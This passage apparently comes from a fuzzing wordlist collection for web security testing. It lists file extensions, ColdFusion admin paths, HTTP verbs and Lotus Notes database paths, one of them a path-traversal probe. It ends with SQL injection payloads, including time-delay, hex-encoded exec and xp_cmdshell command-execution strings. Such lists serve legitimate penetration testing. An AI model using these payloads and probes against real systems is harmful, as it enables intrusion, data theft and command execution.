.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
